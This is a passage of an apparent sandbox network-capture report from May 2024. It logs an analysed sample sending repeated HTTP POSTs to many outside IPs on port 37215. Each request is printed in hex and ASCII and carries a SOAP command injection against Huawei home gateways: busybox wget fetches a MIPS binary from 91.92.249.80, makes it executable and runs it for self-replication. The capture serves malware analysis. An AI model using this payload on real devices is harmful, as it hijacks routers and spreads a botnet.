                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2148192.168.2.2344026195.206.112.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.627469063 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2149192.168.2.236039241.104.77.14437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.627532005 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2150192.168.2.235835041.124.231.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.627820969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2151192.168.2.234313441.124.107.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.628417969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2152192.168.2.2357460157.68.130.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.628446102 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2153192.168.2.2335628197.107.154.24437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.628453016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2154192.168.2.234108641.138.250.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.628490925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2155192.168.2.2346360204.18.39.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.628788948 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2156192.168.2.2360620197.75.33.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.628789902 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2157192.168.2.233423841.50.89.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.628807068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
